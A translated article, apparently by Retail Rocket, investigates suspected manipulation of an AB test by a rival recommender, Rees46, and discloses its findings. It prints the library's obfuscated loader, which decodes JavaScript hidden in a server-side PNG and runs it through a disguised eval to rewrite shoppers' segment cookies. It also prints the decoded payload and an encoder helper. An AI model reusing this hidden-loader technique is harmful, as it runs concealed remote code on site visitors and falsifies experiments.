
Attack on AB test: recipe 'R' + t (101) + 'es46'

AB testing is one of the most powerful and useful product management tools: it lets you measure how particular decisions affect the economic indicators of an Internet business. In five years of work we have run a huge number of AB tests, so we know very well how hard it is to run experiments correctly and which mistakes are repeated again and again.



A few months ago, one of our competitors started doing something strange: offering our customers an AB-test comparison of its recommendation system with Retail Rocket in the form of a wager, with an obligation to pay 100,000 rubles if it lost.



Such stories are nothing new for us: over the company's lifetime our system has been compared with almost every recommender system in Russia and abroad, and we have always shown excellent results (we have not lost a single test on performance).


The first test against Rees was not long in coming, but while it was running we ran into rather strange results, which led to a serious investigation. What we eventually found surprised us so much that we want to share the details of this study and submit its results to the judgment of the IT community and the e-commerce industry in Russia.







AB testing of recommendation systems in the online store “Daughters & Sons”



For several months, the Internet shop “Daughters & Sons” tested three recommender systems: Retail Rocket, Rees, and the company's internal system.



The mechanics of the AB test: the site's entire audience is randomly divided into three equal parts, and each part sees its own version of the site. Only the personal recommendation blocks differ: each segment is shown blocks driven by one of the recommendation systems:







The test measures the conversion of each traffic segment and compares the segments with one another; on that basis, a decision is made about which system works more effectively.



The audience is split on the client by JavaScript code: every user receives the ID of one of the three test segments, which is stored in a cookie and then sent to Google Analytics with every significant action on the site.
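As an illustration of this kind of client-side split, here is a minimal sketch of a "sticky" segment assignment. The cookie name `ab_segment`, the one-year lifetime, and the function names are assumptions made for the example; they are not the store's actual code.

```javascript
// Hypothetical cookie name and lifetime, chosen only for this sketch.
const SEGMENT_COOKIE = "ab_segment";
const SEGMENTS = ["A", "B", "C"];
const ONE_YEAR_SECONDS = 365 * 24 * 60 * 60;

// Parse a document.cookie-style string ("k1=v1; k2=v2") into an object.
function parseCookies(cookieString) {
  const cookies = {};
  for (const part of cookieString.split(";")) {
    const idx = part.indexOf("=");
    if (idx === -1) continue;
    cookies[part.slice(0, idx).trim()] = part.slice(idx + 1).trim();
  }
  return cookies;
}

// Return the visitor's segment. A new segment is drawn only when no valid
// one is stored, so a returning visitor keeps the original assignment.
function getOrAssignSegment(cookieString, random = Math.random) {
  const stored = parseCookies(cookieString)[SEGMENT_COOKIE];
  if (SEGMENTS.includes(stored)) {
    return { segment: stored, setCookie: null };
  }
  const segment = SEGMENTS[Math.floor(random() * SEGMENTS.length)];
  const setCookie =
    `${SEGMENT_COOKIE}=${segment}; path=/; max-age=${ONE_YEAR_SECONDS}`;
  return { segment, setCookie };
}
```

In a browser, the caller would pass `document.cookie` as the argument and, when `setCookie` is not null, assign it back to `document.cookie` before reporting the segment to analytics.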



Test results from Google Analytics at the time of writing - conversion by segment



Segment A - Daughters & Sons internal recommendation system

Segment B - Rees recommendation system

Segment C - Retail Rocket recommendation system







Changes in conversion relative to indicators of the internal recommendation system of "Daughters & Sons"



According to these data, segment C (Retail Rocket) is losing and segment B (Rees) is winning. Note May 27 in particular: on that day Retail Rocket shows the best performance. We will return to this detail later.



During the test, the Retail Rocket engineering team ran many internal checks, found several errors on the site, fixed many integration problems, and tested a range of algorithms and their variations. None of this produced any noticeable change.



Visual assessment of the quality of recommendations



In Retail Rocket, we have several ways to evaluate the effectiveness and quality of recommendations. The very first of them is the so-called “expert assessment” (subjective visual assessment of “adequacy”).



Let's look at the examples of recommendations generated by the Retail Rocket and Rees systems:







For cat litter, our system recommends pet carriers and various kinds of cat food, while the Rees system recommends baby food, tea, and a rectal tube for children.



There are many such examples among frequently visited products, for which statistics accumulate quickly (here is one of the reports on visual quality assessment). Although expert assessment does not directly affect the numbers, it is a simple and fast indicator of how well a recommendation system works.



Indirect quality assessment of recommendations



It seemed strange to us that with recommendations looking like this, the figures were not in our favor, so we spent considerable resources on internal research into the causes.



First, we decided to study the audience that interacts with the product recommendation blocks. When a user clicks a product in a Rees recommendation block, a parameter is added to the URL:







We added a similar parameter to the URL of products from the Retail Rocket recommendation blocks:







Then we built GA segments of users who clicked in the recommendation blocks:







The first hypothesis was that our system predicts users' preferences worse and recommends less relevant products.



If that were the case, our blocks would receive fewer clicks than the Rees recommendation blocks. Google Analytics data refute this: we get 2.81 times more widget clicks:







The second hypothesis we considered: visually good recommendations distract people from buying and reduce conversion. That is, they attract attention but divert users from purchasing and do not contribute to sales growth.



In that case, users who clicked in the Retail Rocket recommendation blocks would convert worse than those who clicked in the Rees blocks. According to Google Analytics this is not so: the conversion of users who clicked in the Retail Rocket blocks is much higher (by 37% over 4 days):







Thus, Retail Rocket recommends products that suit the user much more often, users click on them more often, and the recommendations have a positive effect on sales.



If there are no problems with the users who interact with the recommendations, and the recommendations look relevant visually, what remains is to look at those who do not click on the recommendations.



Online store audience research



Starting to explore this segment of the audience, we noticed two interesting facts:



  1. The Rees segment contains several percent more users than the other segments, although the AB test settings assume the audience is distributed evenly between the recommender systems.
  2. The audience in the Rees segment is more loyal: it has many more visitors who return to the site.








To check that the online store's audience was being split into segments correctly, we tested the segmenter independently using the same code the site used: in parallel with the main split, we ran a second segmentation of the same audience, and the deviation was minimal:





This means that the segmenter works correctly and deviations of several percent should not occur, i.e. the traffic distribution in the “Daughters & Sons” AB test contains an anomaly.
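One common way to judge whether a deviation from an even split is larger than chance would explain is a chi-square goodness-of-fit test. The sketch below is an illustration of that general technique, not the check we ran at the time; the function names are made up for the example. The threshold 13.816 is the standard chi-square critical value for 2 degrees of freedom at p = 0.001, so it applies only to a three-way split.

```javascript
// Chi-square statistic for observed segment sizes against an even split.
function chiSquareUniform(counts) {
  const total = counts.reduce((a, b) => a + b, 0);
  const expected = total / counts.length;
  return counts.reduce((sum, c) => sum + (c - expected) ** 2 / expected, 0);
}

// Critical value of the chi-square distribution, 2 degrees of freedom, p = 0.001.
const CRITICAL_DF2_P001 = 13.816;

// True when a three-way split deviates from 1:1:1 more than chance plausibly allows.
function hasSampleRatioMismatch(counts) {
  if (counts.length !== 3) {
    throw new Error("this threshold is only valid for exactly three segments");
  }
  return chiSquareUniform(counts) > CRITICAL_DF2_P001;
}
```

For example, `hasSampleRatioMismatch([100000, 104000, 100000])` returns `true`, while `hasSampleRatioMismatch([10000, 10050, 9950])` returns `false`. These counts are invented for illustration and are not the test's real numbers.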



Our developers studied the site code in detail for JS errors and bugs that could affect the segmentation, and did not find anything that could cause an anomaly.



The logical assumption was that users could somehow be moving between segments. In our practice there have been cases where users changed segment within a test, for example because of an incorrectly set cookie lifetime (in one store, the cookie holding the AB-test segment identifier lived for only two weeks, and a user who returned after that time was assigned a random value, i.e. could end up in a different test segment). To avoid such situations, we developed a checklist that includes a requirement to make sure users do not change segment during the test.



To track such situations, Google Analytics has a “Sequence” tool that allows you to select users who were first in one segment and then moved to another. For the analysis, we built several such segments in Google Analytics:







And as a result we received the following figures:







These data clearly show that an anomalously large number of users move from the other segments to the Rees segment. This is definitely not a bug, otherwise users would move evenly between all segments.
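Outside Google Analytics, the same kind of count can be obtained from any raw event log. The sketch below assumes a hypothetical log format, an array of `{ userId, ts, segment }` records, and counts every change of segment per user; it illustrates the idea and does not reproduce the GA "Sequence" segments.

```javascript
// events: [{ userId, ts, segment }], in any order; ts is a numeric timestamp.
// Returns an object such as { "C->B": 12 } with the number of observed moves.
function countSegmentMoves(events) {
  const sorted = [...events].sort((x, y) => x.ts - y.ts);
  const lastSegment = new Map(); // userId -> segment seen most recently
  const moves = {};
  for (const { userId, segment } of sorted) {
    const prev = lastSegment.get(userId);
    if (prev !== undefined && prev !== segment) {
      const key = `${prev}->${segment}`;
      moves[key] = (moves[key] || 0) + 1;
    }
    lastSegment.set(userId, segment);
  }
  return moves;
}
```

With an honest random split and a stable cookie, the result should be empty or close to it, and any residual moves should be spread roughly evenly over all pairs of segments.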



The second conclusion: these users make many orders.



* The online store confirmed that these are real orders (almost all of them have the status "purchased")



Using the order numbers of users who were moved to the Rees segment, we examined our internal session logs and identified the following patterns:



  1. Almost all users moved to the Rees segment have goods added to the cart (i.e. this is a more loyal, better-converting audience);
  2. The moves are unevenly distributed across the hours of the day, which indicates that they are triggered manually;
  3. Users are moved to the Rees segment on the days when Retail Rocket begins to win the AB test:






Moving users to the Rees segment (hours across the top, days down the left)







Moving users to the Retail Rocket segment (hours across the top, days down the left)



The table shows that on May 25 and 26 there are almost no moves, and on May 27, when the Retail Rocket system starts to pull ahead, the moves start again. And once again, the users being moved are those who have added goods to the cart and will soon convert into buyers.
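A day-by-hour table of this kind can be built from a list of move timestamps. The following is a minimal sketch under stated assumptions: timestamps are in milliseconds since the Unix epoch, and the default offset of 3 hours corresponds to Moscow time (UTC+3). The function name is hypothetical.

```javascript
const HOUR_MS = 60 * 60 * 1000;

// Build { "YYYY-MM-DD": [count for hour 0, ..., count for hour 23] }
// from move timestamps given in milliseconds since the Unix epoch.
function movesByDayAndHour(timestampsMs, utcOffsetHours = 3) {
  const grid = {};
  for (const ts of timestampsMs) {
    // Shift the instant so that the UTC getters return local wall-clock values.
    const shifted = new Date(ts + utcOffsetHours * HOUR_MS);
    const day = shifted.toISOString().slice(0, 10);
    if (!grid[day]) grid[day] = new Array(24).fill(0);
    grid[day][shifted.getUTCHours()] += 1;
  }
  return grid;
}
```

Rows that are empty for whole days and then fill up abruptly from a particular hour are the pattern to look for.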



Examination of the code that works on the site



Since the movement of loyal users to the Rees segment looked suspicious, we began looking for the cause of the segment change and examining the code. We carefully investigated who works with the cookies and how, and whether anyone could have accidentally caused such errors, and at first found nothing suspicious.



There were two options: either the cookie is changed by the Daughters & Sons store's server, which is not visible on the client, or it is changed by dynamic code that arrives from a server in response to some request.



While checking for dynamic code, we looked for, among other things, the eval function: a JavaScript function that executes any text, for example text sent from a server, as JavaScript code. In dishonest hands it can hide what the code does while giving it full access to the site's entire environment.



During the test, we came across a strange piece of code in the JS Rees library:





A piece of code from the Rees JS library
key: "markDMP",
value: function(e) {
  var t = function(e) { return String.fromCharCode(e) };
  if (e)
    for (var i in e)
      if (e.hasOwnProperty(i))
        if (function(e) { return /\x61\x70\x69\x2E\x72\x65\x65\x73\x34\x36\x2E\x63\x6F\x6D/.test(e) }(e[i])) {
          var n = function() {
            var n = document.createElement("canvas")
              , o = void 0
              , s = t(67)
              , a = t(68)
              , u = l.default.get(s.toLowerCase() + "ity") || l.default.get(t(71) + "EO_" + a + "ELIVERY_" + s + "ITY_I" + a)
              , c = [s + "UR", s + "ITY", s + "ODE"];
            if (n && n.getContext && u && !1 === g.default.isDebug()) {
              if (/^a:/.test(u)) {
                var h = r.unserialize(u);
                if (!h || 464 === h[c.join("_")]) return "continue"
              } else if (3784 === u || 3577 === u) return "continue";
              o = new Image,
              o.crossOrigin = "use-credentials",
              o.onload = function(e, r) {
                r.width = this.naturalWidth, r.height = this.naturalHeight;
                var i = r.getContext("2d");
                i.drawImage(this, 0, 0);
                var n = i.getImageData(0, 0, this.naturalWidth, this.naturalHeight)
                  , o = n.data
                  , s = void 0
                  , a = void 0
                  , u = "";
                for (s = 0, a = o.length; s < a; s++)
                  if (!(s % 4 == 3 && s > 0)) {
                    if (0 === o[s]) break;
                    u += function(e) { return String.fromCharCode(~-e) }(o[s])
                  }
                try { window[t(101) + "val"](u) } catch (e) {}
              }
              .bind(o, t, n),
              o.src = e[i]
            }
          }();
          if ("continue" === n) continue
        } else {
          var o = document.createElement("img");
          o.src = e[i], o.style.width = 0, o.style.height = 0, o.style.display = "none", o.style.position = "absolute", o.style.left = "-9999px", document.body.appendChild(o)
        }
}
}








The full code is available at the link. What stands out about this fragment is that it is clearly trying to hide what it does.
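The hidden strings can be recovered by evaluating the same expressions the fragment uses. The sketch below copies those expressions verbatim from the fragment above; only the surrounding `decoded` object and its property names are ours, added for readability.

```javascript
// Same helper as in the library fragment: character code -> one-character string.
const t = (code) => String.fromCharCode(code);

const s = t(67); // "C"
const a = t(68); // "D"

const decoded = {
  // Name of the window property that the fragment calls with the decoded text.
  calledFunction: t(101) + "val",
  // The two keys passed to l.default.get(...).
  firstKey: s.toLowerCase() + "ity",
  secondKey: t(71) + "EO_" + a + "ELIVERY_" + s + "ITY_I" + a,
  // The key looked up in the unserialized value.
  serializedKey: [s + "UR", s + "ITY", s + "ODE"].join("_"),
  // The hex escapes of the URL-matching regular expression, read as a string.
  hostPattern: "\x61\x70\x69\x2E\x72\x65\x65\x73\x34\x36\x2E\x63\x6F\x6D",
};

console.log(decoded);
// calledFunction: "eval"
// firstKey:       "city"
// secondKey:      "GEO_DELIVERY_CITY_ID"
// serializedKey:  "CUR_CITY_CODE"
// hostPattern:    "api.rees46.com"
```

In other words, `window[t(101) + "val"](u)` is a call to `eval` written so that a plain text search for "eval" does not find it.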



Several conclusions can be drawn from the code:











We assume that once this information is published, Rees will delete this code, so we saved it using two external independent services: https://web.archive.org and https://www.runscope.com



A formatted version is available for study at the link.



To understand what exactly this fragment does, we wrote a module that emulates user actions and logs all requests to the Rees server. On May 25 and 26 nothing happened (this is also visible in the table of hourly user moves to Rees), and on May 27, when according to Google Analytics the Retail Rocket system pulled ahead in the AB test, users began to be moved to the Rees segment at around 7 pm Moscow time.







Moving users to the Rees segment (hours across the top, days down the left)



At the same time, we recorded requests to the Rees server for an image in PNG format (the contents of the image can be viewed at the link). Requested on its own, the image is not available (a 404 error is returned), but when the request is sent with the user's Rees session, the image can be downloaded:







If we feed the image into the code that the library was trying to hide (for convenience we extracted it separately), we get the following JS, which changes the value of the cookie that stores the user's AB-test segment:



 document.cookie="rr-VisitorSegment_Rec=3:2; domain=.dochkisinochki.ru; path=/; expires=Mon, 25 Sep 2017 10:15:20 +0000";document.cookie="DS_SM_rrSegmentRecommendedABC=B; domain=.dochkisinochki.ru; path=/ 


This code explicitly sets the two store cookies that hold the user's segment to the value of the Rees segment.
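The decoding step itself is simple, and the sketch below reproduces the logic of the `onload` handler in the library fragment: walk over the RGBA bytes, skip every alpha byte, stop at the first zero byte, and turn each remaining byte minus one into a character. `decodePayload` mirrors the fragment; `encodePayload` is our own hypothetical inverse, added only so the example can be run without a canvas, and says nothing about how the real image was produced.

```javascript
// Mirrors the loop in the library's onload handler. In the browser the input
// would be ctx.getImageData(...).data; here any array of bytes will do.
function decodePayload(rgba) {
  let out = "";
  for (let i = 0; i < rgba.length; i++) {
    if (i % 4 === 3) continue; // every 4th byte is the alpha channel
    if (rgba[i] === 0) break; // a zero byte terminates the payload
    out += String.fromCharCode(rgba[i] - 1); // same result as ~-byte
  }
  return out;
}

// Hypothetical encoder for the round trip below (works for char codes < 255).
function encodePayload(text) {
  // One extra slot guarantees a terminating zero byte.
  const pixelCount = Math.ceil((text.length + 1) / 3);
  const rgba = new Uint8ClampedArray(pixelCount * 4); // zero-filled
  for (let p = 0; p < pixelCount; p++) rgba[p * 4 + 3] = 255; // opaque pixels
  let j = 0;
  for (let k = 0; k < text.length; k++) {
    if (j % 4 === 3) j++; // leave the alpha byte alone
    rgba[j++] = text.charCodeAt(k) + 1;
  }
  return rgba;
}

const sample = 'document.cookie="x=1; path=/"';
console.log(decodePayload(encodePayload(sample)) === sample); // true
```

The library then passes the decoded string to `eval`, so whatever the server puts into the image runs with full access to the page.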



We are sure that Rees will hide all traces of this attack, so the image has also been saved via a request from an independent third-party service.



Thus, the Rees code moves users who have added a product to the cart and are about to place an order into its own segment.



According to data collected since we began logging user moves (May 1–28) and built on the segment initially assigned to each user (that is, everyone who first visited the site before May 1 is excluded), Retail Rocket reliably wins the test, and Rees reduces the store's sales:
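Attributing every user to the segment they were first assigned to makes later cookie changes irrelevant to the comparison. The sketch below shows that idea on a hypothetical visit log of `{ userId, ts, segment, ordered }` records; it is an illustration and not the exact procedure behind the figures above.

```javascript
// visits: [{ userId, ts, segment, ordered }], in any order.
// Returns { segment: { users, buyers, conversion } } keyed by the FIRST
// segment each user was seen in, regardless of later segment changes.
function conversionByInitialSegment(visits) {
  const sorted = [...visits].sort((x, y) => x.ts - y.ts);
  const users = new Map(); // userId -> { initial, bought }
  for (const v of sorted) {
    if (!users.has(v.userId)) {
      users.set(v.userId, { initial: v.segment, bought: false });
    }
    if (v.ordered) users.get(v.userId).bought = true;
  }
  const stats = {};
  for (const { initial, bought } of users.values()) {
    if (!stats[initial]) stats[initial] = { users: 0, buyers: 0, conversion: 0 };
    stats[initial].users += 1;
    if (bought) stats[initial].buyers += 1;
  }
  for (const s of Object.values(stats)) s.conversion = s.buyers / s.users;
  return stats;
}
```

A user who started in segment C, was later switched to B, and then ordered is counted as a buyer for C here, whereas an analysis by current cookie value would credit B.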







The exact period over which loyal online store users were migrated to the Rees segment is unknown, so the real difference in effectiveness is likely even larger.



In addition, we see signs of other attacks on the test in the Rees code. For example, when a user first visits the site, the Rees system performs cookie matching with several RTB networks.



Sync code:







The saved request can be viewed at the link to web.archive.org



Sync requests:







At a minimum, this gives the online store's competitors access to these users; at a maximum, it makes it possible to retarget traffic from the Rees segment and to divert traffic from the test's other segments to a competitor, reducing their conversion.



An interesting fact is that this attack of Rees was supported by an active PR campaign in the media and social networks:







Instead of conclusion



In almost 5 years of work, this is the first time we have encountered such behavior. Unfortunately, AB tests can be run only when there is complete confidence in the integrity of all participants.



We consider such methods of competition unfair and unacceptable: they harm the entire community and undermine trust in established practices. We are currently pursuing legal action to hold those responsible accountable, and we urge the community to share its experience in dealing with such situations.

Source: https://habr.com/ru/post/330012/


